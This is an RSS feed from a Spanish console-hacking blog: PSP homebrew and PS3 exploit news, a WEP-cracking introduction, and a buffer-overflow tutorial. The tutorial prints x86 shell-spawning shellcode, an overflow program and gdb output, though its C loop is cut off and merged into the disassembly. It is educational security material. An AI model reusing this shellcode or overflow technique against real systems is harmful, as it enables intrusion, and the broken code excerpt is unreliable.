<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Planeta-Consolas.com &#187; hacking</title>
	<atom:link href="http://planeta-consolas.com/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://planeta-consolas.com</link>
	<description>¡Todo lo relacionado a consolas de juegos!</description>
	<lastBuildDate>Mon, 06 Sep 2010 03:45:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>HBL Beta r90, homebrew en firmware oficial</title>
		<link>http://fr33kk0mpu73r.blogspot.com/2010/06/hbl-beta-r90-homebrew-en-firmware.html</link>
		<comments>http://fr33kk0mpu73r.blogspot.com/2010/06/hbl-beta-r90-homebrew-en-firmware.html#comments</comments>
		<pubDate>Mon, 21 Jun 2010 23:49:00 +0000</pubDate>
		<dc:creator>m0skito</dc:creator>
				<category><![CDATA[PSP]]></category>
		<category><![CDATA[go]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[half byte loader]]></category>
		<category><![CDATA[hbl]]></category>
		<category><![CDATA[homebrew]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[La verdad es que la satisfacción que uno siente cuando ha cumplido un proyecto es díficil de describir. ¿Quién me hubiera dicho a mí que iba a estar ejecutando homebrews en una PSPGo con un loader hecho por mí mismo? Para parafrasear a un ídolo ...]]></description>
			<content:encoded><![CDATA[La verdad es que la satisfacción que uno siente cuando ha cumplido un proyecto es díficil de describir. ¿Quién me hubiera dicho a mí que iba a estar ejecutando homebrews en una PSPGo con un loader hecho por mí mismo? Para parafrasear a un ídolo de mi juventud: "me encanta que las cosas salgan bien". Vaya gilipollas debí de ser de adolescente.<br /><br />Más información sobre HBL: <a class="linkification-ext" href="http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=190" title="Linkification: http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=190">http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=190</a><br /><br />Homebrews probados y que corren en HBL: <a class="linkification-ext" href="http://advancedpsp.tk/foro_es/viewtopic.php?f=41&amp;t=425" title="Linkification: http://advancedpsp.tk/foro_es/viewtopic.php?f=41&amp;t=425">http://advancedpsp.tk/foro_es/viewtopic.php?f=41&amp;t=425</a><br /><br />Descarga del HBL:<br /><br /><a class="linkification-ext" href="http://code.google.com/p/valentine-hbl/downloads/list" title="Linkification: http://code.google.com/p/valentine-hbl/downloads/list">http://code.google.com/p/valentine-hbl/downloads/list</a><br /><a class="linkification-ext" href="http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=311" title="Linkification: http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=311">http://advancedpsp.tk/foro_es/viewtopic.php?f=39&amp;t=311</a><br /><a class="linkification-ext" href="http://wololo.net/wagic/hbl/" title="Linkification: http://wololo.net/wagic/hbl/">http://wololo.net/wagic/hbl/</a><br /><br />Ah, y os recuerdo que este proyecto es GPL, así que tenéis los fuentes a vuestra disposición ;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/885312786826889279-3603105204608340662?l=fr33kk0mpu73r.blogspot.com' alt='' /></div>]]></content:encoded>
			<wfw:commentRss>http://fr33kk0mpu73r.blogspot.com/feeds/3603105204608340662/comments/default</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ejecutando scripts caseros en PS3</title>
		<link>http://fr33kk0mpu73r.blogspot.com/2010/06/ejecutando-scripts-caseros-en-ps3.html</link>
		<comments>http://fr33kk0mpu73r.blogspot.com/2010/06/ejecutando-scripts-caseros-en-ps3.html#comments</comments>
		<pubDate>Mon, 21 Jun 2010 23:45:00 +0000</pubDate>
		<dc:creator>m0skito</dc:creator>
				<category><![CDATA[PS3]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[homebrew]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Un equipo denominado StreetskaterFU (SKFU) ha conseguido ejecutar scripts caseros en PS3 desde el pendrive USB, y han liberado un PoC, que al parecer funciona en todas las PS3. Por ahora hacen una llamada a la calma, ya que aún están probando los lí...]]></description>
			<content:encoded><![CDATA[Un equipo denominado StreetskaterFU (SKFU) ha conseguido ejecutar scripts caseros en PS3 desde el pendrive USB, y han liberado un PoC, que al parecer funciona en todas las PS3. Por ahora hacen una llamada a la calma, ya que aún están probando los límites de este agujero.<br /><br />Para más información, os enlazo al blog en cuestión: http://streetskaterfu.blogspot.com/2010/06/skfus-exploit-loader-poc-01.html<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/885312786826889279-2079140785269637635?l=fr33kk0mpu73r.blogspot.com' alt='' /></div>]]></content:encoded>
			<wfw:commentRss>http://fr33kk0mpu73r.blogspot.com/feeds/2079140785269637635/comments/default</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>La PS3 ha caído&#8230; en parte</title>
		<link>http://fr33kk0mpu73r.blogspot.com/2010/01/la-ps3-ha-caido-en-parte.html</link>
		<comments>http://fr33kk0mpu73r.blogspot.com/2010/01/la-ps3-ha-caido-en-parte.html#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:00:00 +0000</pubDate>
		<dc:creator>m0skito</dc:creator>
				<category><![CDATA[PS3]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[geohot]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[GeoHot, el culpable de hacer que la seguridad del iPhone cayera, ahora ha conseguido un acceso total al hipervisor de la PS3, con acceso total a toda la RAM. Queda por saber si va a ser posible parchear la RAM para inyectar código propio. Lo probaría...]]></description>
			<content:encoded><![CDATA[GeoHot, el culpable de hacer que la seguridad del iPhone cayera, ahora ha conseguido un acceso total al hipervisor de la PS3, con acceso total a toda la RAM. Queda por saber si va a ser posible parchear la RAM para inyectar código propio. Lo probaría, pero no tengo PS3 xD<br /><br /><a href="http://geohotps3.blogspot.com/">Blod de GeoHot sobre PS3</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/885312786826889279-3836331802037499368?l=fr33kk0mpu73r.blogspot.com' alt='' /></div>]]></content:encoded>
			<wfw:commentRss>http://fr33kk0mpu73r.blogspot.com/feeds/3836331802037499368/comments/default</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[FADB] 9. Ejecución de una cadena de caracteres mediante desbordamiento de buffer</title>
		<link>http://fr33kk0mpu73r.blogspot.com/2009/02/fadb-9-ejecucion-de-una-cadena-de.html</link>
		<comments>http://fr33kk0mpu73r.blogspot.com/2009/02/fadb-9-ejecucion-de-una-cadena-de.html#comments</comments>
		<pubDate>Sun, 01 Feb 2009 15:33:00 +0000</pubDate>
		<dc:creator>m0skito</dc:creator>
				<category><![CDATA[ataque]]></category>
		<category><![CDATA[buffer]]></category>
		<category><![CDATA[debug]]></category>
		<category><![CDATA[depurar]]></category>
		<category><![CDATA[desbordamiento]]></category>
		<category><![CDATA[desensamblar]]></category>
		<category><![CDATA[dirección de retorno]]></category>
		<category><![CDATA[ensamblador]]></category>
		<category><![CDATA[execve]]></category>
		<category><![CDATA[gdb]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[memoria]]></category>
		<category><![CDATA[pila]]></category>
		<category><![CDATA[sobreescritura]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[FUNDAMENTOS DE LOS ATAQUES POR DESBORDAMIENTO DE BUFFER¿Cómo obtenemos el mismo resultado utilizando la técnica del desbordamiento de buffer? Podemos crear un array que contenga varias veces la dirección de la cadena de caracteres ejecutable y copi...]]></description>
			<content:encoded><![CDATA[<span style="font-family:georgia;"><span style="font-weight: bold; color: rgb(204, 0, 0);">FUNDAMENTOS DE LOS ATAQUES POR DESBORDAMIENTO DE BUFFER</span><br /><br />¿Cómo obtenemos el mismo resultado utilizando la técnica del desbordamiento de buffer? Podemos crear un array que contenga varias veces la dirección de la cadena de caracteres ejecutable y copiarlo a un buffer más pequeño, desbordándolo y con suerte sobreescribiendo la dirección de retorno en la pila. Echémosle un vistazo al siguiente código en C, llamado prueba5.c:<br /><br />char str[50];<br />void main()<br />{<br />char *code= // 26 bytes<br />"\x31\xc0" // xorl %eax,%eax<br />"\x50" // pushl %eax<br />"\x68\x2f\x73\x68\x00" // pushl $0x68732f<br />"\x68\x2f\x62\x69\x6e" // pushl $0x6e69622f<br />"\x89\xe3" // movl %esp,%ebx<br />"\x50" // pushl %eax<br />"\x53" // pushl %ebx<br />"\x89\xe1" // movl %esp,%ecx<br />"\x31\xd2" // xor %edx,%edx<br />"\xb0\x0b" // movb $0x0b,%al<br />"\xcd\x80" // int $0x80<br />;<br />int i;<br />char buff[5];<br />int *p = (int *)str;<br />for (i = 0; i <>: push %ebp<br />0x804833d <main+1>: mov %esp,%ebp<br />0x804833f <main+3>: sub $0x38,%esp<br />0x8048342 <main+6>: and $0xfffffff0,%esp<br />0x8048345 <main+9>: mov $0x0,%eax<br />0x804834a <main+14>: sub %eax,%esp<br />0x804834c <main+16>: movl $0x80483e8,0xfffffff4(%ebp)<br />0x8048353 <main+23>: movl $0x8049540,0xffffffd4(%ebp)<br />0x804835a <main+30>: movl $0x0,0xfffffff0(%ebp)<br />0x8048361 <main+37>: cmpl $0x31,0xfffffff0(%ebp)<br />0x8048365 <main+41>: jle 0x8048369 <main+45><br />0x8048367 <main+43>: jmp 0x8048381 <main+69><br />0x8048369 <main+45>: mov 0xffffffd4(%ebp),%eax<br />0x804836c <main+48>: mov %eax,%edx<br />0x804836e <main+50>: mov 0xfffffff4(%ebp),%eax<br />0x8048371 <main+53>: mov %eax,(%edx)<br />0x8048373 <main+55>: lea 0xffffffd4(%ebp),%eax<br />0x8048376 <main+58>: addl $0x4,(%eax)<br />0x8048379 <main+61>: lea 0xfffffff0(%ebp),%eax<br />0x804837c <main+64>: addl $0x4,(%eax)<br />0x804837f <main+67>: jmp 0x8048361 <main+37><br />0x8048381 <main+69>: sub $0x8,%esp<br />0x8048384 <main+72>: push $0x8049540<br />0x8048389 <main+77>: lea 0xffffffd8(%ebp),%eax<br />0x804838c <main+80>: push %eax<br />0x804838d <main+81>: call 0x8048268 <strcpy><br />0x8048392 <main+86>: add $0x10,%esp<br />0x8048395 <main+89>: leave<br />0x8048396 <main+90>: ret<br />End of assembler dump.<br />(gdb)<br /><br />Creo que el código en C queda suficientemente claro, no vamos a entrar en los detalles en ensamblador. Sin emabargo vamos a poner un punto de interrupción justo antes de RET (<main+90>) para comprobar cuál es la dirección de retorno de main().<br /><br />(gdb) b *0x8048396<br />Breakpoint 1 at 0x8048396: file prueba5.c, line 28.<br />(gdb) r<br />Starting program: /home/m0s/Programacion/C%2fC++/prueba5<br />Breakpoint 1, 0x08048396 in main () at prueba5.c:28<br />(gdb) i r esp<br />esp 0xbffff80c 0xbffff80c<br />(gdb) x 0xbffff80c<br />0xbffff80c: 0x080483e8<br />(gdb) x 0x080483e8<br />0x80483e8 <_io_stdin_used+4>: 0x6850c031<br />(gdb)<br /><br />Efectivamente salta a nuestra cadena de caracteres maliciosa.<br /></main+90></main+90></main+89></main+86></strcpy></main+81></main+80></main+77></main+72></main+69></main+37></main+67></main+64></main+61></main+58></main+55></main+53></main+50></main+48></main+45></main+69></main+43></main+45></main+41></main+37></main+30></main+23></main+16></main+14></main+9></main+6></main+3></main+1></main></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/885312786826889279-3472234870516628462?l=fr33kk0mpu73r.blogspot.com' alt='' /></div>]]></content:encoded>
			<wfw:commentRss>http://planeta-consolas.com/2009/02/01/fadb-9-ejecucion-de-una-cadena-de-caracteres-mediante-desbordamiento-de-buffer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[HWEP] 0.Introducción</title>
		<link>http://fr33kk0mpu73r.blogspot.com/2009/02/hwep-0introduccion.html</link>
		<comments>http://fr33kk0mpu73r.blogspot.com/2009/02/hwep-0introduccion.html#comments</comments>
		<pubDate>Sun, 01 Feb 2009 13:51:00 +0000</pubDate>
		<dc:creator>m0skito</dc:creator>
				<category><![CDATA[cifrado]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[inalámbrico]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[HACK WEPHola de nuevo a todos. Se ve que he estado bastante con otros blogs por lo movida que está la política en todo el mundo :)En esta nueva serie intentaré explicar un poco cómo funcionan las redes inalámbricas y sobre todo poner de manifiesto...]]></description>
			<content:encoded><![CDATA[<span style="font-family:georgia;"><span style="font-weight: bold; color: rgb(204, 0, 0);">HACK WEP</span><br /><br />Hola de nuevo a todos. Se ve que he estado bastante con otros blogs por lo movida que está la política en todo el mundo :)<br /><br />En esta nueva serie intentaré explicar un poco cómo funcionan las redes inalámbricas y sobre todo poner de manifiesto la debilidad criptográfica del protocolo más comúnmente usado, el Wired Equivalent Privacy (Privacidad Equivalente a Cableado, WEP). A pesar de su nombre, el cifrado WEP tiene un defecto en su algoritmo de cifrado (RC4) descubierto por el llamado ataque Fluhrer, Mantin y Shamir (ataque FMS).<br /><br />Aviso de antemano que, aunque WEP no es del todo seguro, hay escenarios en que no se puede atacar debido a seguridades adicionales (por ejemplo el uso de filtrado de dirección MAC). Tampoco es sencillo si no entendemos el mecanismo por el que funcionan las conexiones inalámbricas y el cifrado en sí, así que prestad especial atención a esa parte de la explicación, es fundamental para saber qué herramientas usar, cuándo y cómo. ¡No me sean <span style="font-style: italic;">script kiddies</span>!<br /><br />Para las pruebas usaré una distribución de Linux LiveCD (no necesita instalación) orientada a seguridad, BackTrack, disponible en <a href="http://www.remote-exploit.org/backtrack_download.html">su web</a>. Aseguraos primero de que vuestra tarjeta inalámbrica está soportada por esta distribución (no creo que haya problema en este aspecto) y que soporta el modo monitor (un equivalente al modo promiscuo de las tarjetas ethernet). No voy a discutir cómo arrancar desde un CD ni la utilización a nivel de usuario de la distribución. Iremos directamente al meollo de la cuestión.<br /><br />Mi consejo es que <span style="font-weight: bold;">NO USEN WEP</span> si quieren mantener su conexión inalámbrica segura. WPA ofrece una protección mucho más segura y es el estándar en la actualidad, aunque muchos puntos de acceso aún vienen configrados con WEP por defecto.<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/885312786826889279-1430790611128942348?l=fr33kk0mpu73r.blogspot.com' alt='' /></div>]]></content:encoded>
			<wfw:commentRss>http://planeta-consolas.com/2009/02/01/hwep-0-introduccion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
